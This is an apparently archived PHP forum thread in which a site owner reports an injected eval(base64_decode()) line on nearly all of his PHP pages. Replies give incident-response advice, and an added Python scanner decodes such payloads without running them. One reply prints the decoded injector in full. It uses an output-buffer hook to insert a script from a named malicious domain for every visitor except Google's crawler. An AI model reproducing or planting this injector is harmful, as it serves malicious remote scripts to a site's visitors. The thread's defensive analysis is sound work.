
On the first line of nearly all the php pages on my site the following has been inserted:

<?php /**/ eval(base64_decode(".................="));?>

 

dots replace actual code - it's about 3000 characters long

and when I go to the site I get redirected (sometimes) to some bogus site - the last one was adobeupdatemanager.org - and a warning in Firefox / Google "to get out of here".

 

This is a disaster! Is it a hack? How could it have happened? What should my first course of action be? What is the long term remedy? Can I post the code which I have omitted? I think it must be hex or something. I don't want to post the address of my site here.

 

Thanks for any help

https://forums.phpfreaks.com/topic/248982-has-my-site-been-hacked/

Yes, it probably is a hack, either through direct access via ftp, or sql injection, or security exploits on a shared server. First thing would be to take the site down and start going through your Apache and DB server logs to see if anything stands out.

I haven't tried this one, but it looks like it should be as close to plug-n-play as you're gonna find . . .

 

http://perishablepress.com/press/2010/05/19/htaccess-redirect-maintenance-page-site-updates/

At this point you need to figure out if that script was the only thing compromised.

 

If you don't run your webserver you need to contact your hosting provider as well.  Use the phone; this is not an email-type situation.  You'll need to know if your account security was compromised.  If your billing information was taken, you'll possibly need to contact your credit card company and/or your bank and so forth.  Some insurance companies have identity theft coverage; talk to them about it.  Your provider could possibly have additional information and may want to take steps to bump up security, check for other intrusions and possibly report the incident to the authorities.  Make sure your provider tells you what they're doing about the situation; never accept the "we've handled it" line, or if they tell you some such thing it may be time to switch providers.

 

If you have customer information stored on your webserver, you need to figure out if it was taken; if so you may need to (by law in some places) notify your customers.  Responsible security practices would have the site down until it's fixed, then notify your customers when you know the extent of the data breach.

 

eval is one of those things I tend to disable with the suhosin patch.  base64_decode shows that the payload is encoded in base64, so it's not hex.  You could switch the eval to echo to see what the payload actually is.  But please do so in a secure environment; a non-networked virtual machine is handy for this kind of analysis.

 

Until you know the extent of the intrusion you need to go into tinfoil hat mode.  You can start with running checks on your personal computer and afterwards password changes need to happen as well, with anything related to that account, billing login, ftp, mysql, panel, web services that your site may use, contact email account.

Thanks for those pieces of advice.

 

The htaccess worked fine and immediately, so now the site is down pointing to a maintenance message, which is at least a first step.

 

Fortunately I have next to no mysql (maybe some old databases, but not used) and no customer or login information or other sensitive info on the site - precisely because I felt I would not be able to guarantee safety, with my pretty weak coding experience.

 

So it's really a matter of removing the bad code, which should be easy, then checking there are no more nasties, which will be fairly time consuming since it's a big site. Then finding the breach - my first guess is the php I've been writing over the summer left an obvious exploit!

 

But as you say if it's via FTP/password that's a much bigger problem as it'll imply a breach of my home computer or laptop where the password is stored, so I'd have to change all pws. My password is very long and complex so it can't have been guessed. I'll check with the host though too, just in case they've been exploited (would they tell me?). But if all those come up clean then it seems most likely my PHP has left an opening.

 

I can see the date all the files have been changed (less than a week ago) so I will try to check FTP logs for around that date.

 

I'm wondering now if it's someone sitting at a computer somewhere that has specifically targeted my site, or whether it's more likely to be a bot that automatically detects and exploits unsafe code. Not sure which would be worse.

 

a bot that automatically detects and exploits unsafe code

Bingo. We see quite a few of these kinds of 'hacked sites' that follow the same pattern, so it's unlikely you were targeted specifically (unless you think you have reason you would be.)

 

Find all instances of the base64_decode as a start, then take a look at the way you're handling any user inputs (especially things like file uploads.) Also as mentioned above, change your passwords, etc.
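As an added example (not code from the thread or from any of its posters), a small scanner that does what the replies above advise: find every injected eval(base64_decode(...)) line, look at the payload as text instead of running it, and follow one level of nested base64 so an embedded script tag shows up. The file contents, domain and payload are constructed stand-ins.

```python
"""Find injected eval(base64_decode(...)) lines in PHP files and read the payload
as text instead of running it. Added example; paths and payload are constructed."""
import base64
import binascii
import re
from pathlib import Path

# The injected form described in the thread: <?php /**/ eval(base64_decode("..."));?>
INJECT_RE = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')
# Nested base64 literals inside the decoded payload (the gml() string in the thread).
INNER_RE = re.compile(r'base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
URL_RE = re.compile(r'https?://[^\s"\'<>]+')

def decode_b64(blob):
    """Decode base64 text to str; return None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None

def analyse_source(src):
    """Return one finding per injected eval in a file's source text (no PHP is run)."""
    findings = []
    for m in INJECT_RE.finditer(src):
        payload = decode_b64(m.group(1))
        if payload is None:
            continue
        # Follow one level of nested base64 so embedded <script> tags show up as text.
        inner = [s for s in (decode_b64(b) for b in INNER_RE.findall(payload)) if s]
        findings.append({
            "offset": m.start(),
            "payload_len": len(payload),
            "uses_output_buffer": "ob_start(" in payload,   # the mrobh() hook
            "uses_gzinflate": "gzinflate(" in payload,      # the home-made gzdecode()
            "urls": sorted(set(URL_RE.findall(payload + "".join(inner)))),
        })
    return findings

def scan_tree(root):
    """Walk a directory tree and report every .php file carrying the injection."""
    return {str(p): hits for p in Path(root).rglob("*.php")
            if (hits := analyse_source(p.read_text(errors="replace")))}

# Constructed sample: a harmless stand-in for the thread's ob_start()/gml() payload.
SAMPLE_INNER = base64.b64encode(b'<script src="http://example.invalid/js.php?s=1"></script>').decode()
SAMPLE_PAYLOAD = ('if(!isset($GLOBALS["mr_no"])){ function gml(){ return base64_decode("%s"); } '
                  'ob_start("mrobh"); }' % SAMPLE_INNER).encode()
SAMPLE_FILE = ('<?php /**/ eval(base64_decode("%s"));?>\n<?php echo "site"; ?>\n'
               % base64.b64encode(SAMPLE_PAYLOAD).decode())
```

scan_tree() takes the path of an offline copy of the site; the decoded text is only ever displayed, never handed to PHP.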

Thanks - I don't see any reason to be targeted specifically, but then after any attack (I guess it would be the same with a burglary) you can't help but wonder. To be honest you'd have to have a lot of free time on your hands to bother to bring down my site. I think the bot idea is more of a relief somehow, but it's going to be difficult to change all the code I've written. There is no uploading on the site, so that can't be it, but I do have a script that writes stuff on another page. Later on I'll post examples of my scripts to see if anyone can see a loophole.

 

I also did wonder about a guy who asked to advertise on the site. I inserted his code for a fee on one page - it looked legit, but he gave no contact details or anything. That was a month or two before this.

 

For reference, the actual exploit code is very similar to these two examples:

http://forums.oscommerce.com/topic/336693-i-have-been-hacked-help-please/

http://drupal.org/node/504010

(not sure what the rule for linking to these sorts of posts is, apologies if it's not allowed)

It's a long line of base64, which I think first redirects Google requests to a particular website, and then seems to unpack a whole bunch of stuff using gzdecode. I can't follow it after that. It looks really nasty.

 

I've contacted the host and they said it wasn't a breach on their part and they would look at the FTP logs.

Sure this is it:

 

if(function_exists('ob_start')&&!isset($GLOBALS['mr_no'])){
  $GLOBALS['mr_no']=1;
  if(!function_exists('mrobh')){
    if(!function_exists('gml')){
      // Returns the injected <script> tag for every visitor except Google's crawler
      function gml(){
        if (!stristr($_SERVER["HTTP_USER_AGENT"],"google")){
          return base64_decode("PHNjcmlwdCBzcmM9Imh0dHA6Ly9zd2VlcHN0YWtlc2FuZGNvbnRlc3RzaW5mby5jb20vanMucGhwP3M9MSI+PC9zY3JpcHQ+");
        }
        return "";
      }
    }
    if(!function_exists('gzdecode')){
      // Home-made gzdecode(): parses the gzip header flags, then gzinflate()s the rest
      function gzdecode($R5A9CF1B497502ACA23C8F611A564684C){
        $R30B2AB8DC1496D06B230A71D8962AF5D=@ord(@substr($R5A9CF1B497502ACA23C8F611A564684C,3,1));
        $RBE4C4D037E939226F65812885A53DAD9=10;
        $RA3D52E52A48936CDE0F5356BB08652F2=0;
        if($R30B2AB8DC1496D06B230A71D8962AF5D&4){
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=@unpack('v',substr($R5A9CF1B497502ACA23C8F611A564684C,10,2));
          $R63BEDE6B19266D4EFEAD07A4D91E29EB=$R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
          $RBE4C4D037E939226F65812885A53DAD9+=2+$R63BEDE6B19266D4EFEAD07A4D91E29EB;
        }
        // gzip FLG bit 8 (FNAME); the "8)" was eaten by the forum's smiley rendering
        if($R30B2AB8DC1496D06B230A71D8962AF5D&8){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&16){
          $RBE4C4D037E939226F65812885A53DAD9=@strpos($R5A9CF1B497502ACA23C8F611A564684C,chr(0),$RBE4C4D037E939226F65812885A53DAD9)+1;
        }
        if($R30B2AB8DC1496D06B230A71D8962AF5D&2){
          $RBE4C4D037E939226F65812885A53DAD9+=2;
        }
        $R034AE2AB94F99CC81B389A1822DA3353=@gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C,$RBE4C4D037E939226F65812885A53DAD9));
        if($R034AE2AB94F99CC81B389A1822DA3353===FALSE){
          $R034AE2AB94F99CC81B389A1822DA3353=$R5A9CF1B497502ACA23C8F611A564684C;
        }
        return $R034AE2AB94F99CC81B389A1822DA3353;
      }
    }
    // Output-buffer callback: appends the script tag just before </body> (or at the end)
    function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B){
      Header('Content-Encoding: none');
      $RA179ABD3A7B9E28C369F7B59C51B81DE=gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
      if(preg_match('/\<\/body/si',$RA179ABD3A7B9E28C369F7B59C51B81DE)){
        return preg_replace('/(\<\/body[^\>]*\>)/si',gml()."\n".'$1',$RA179ABD3A7B9E28C369F7B59C51B81DE);
      }else{
        return $RA179ABD3A7B9E28C369F7B59C51B81DE.gml();
      }
    }
    ob_start('mrobh');
  }
}

 

The first bit of base64 code within the code points to:

<script src="http://sweepstakesandcontestsinfo.com/js.php?s=1"></script>

 

The version discussed here, which looks similar, is dissected at the bottom of the thread, and has a trojan payload:

http://forums.oscommerce.com/topic/355864-base-64-infection/

 
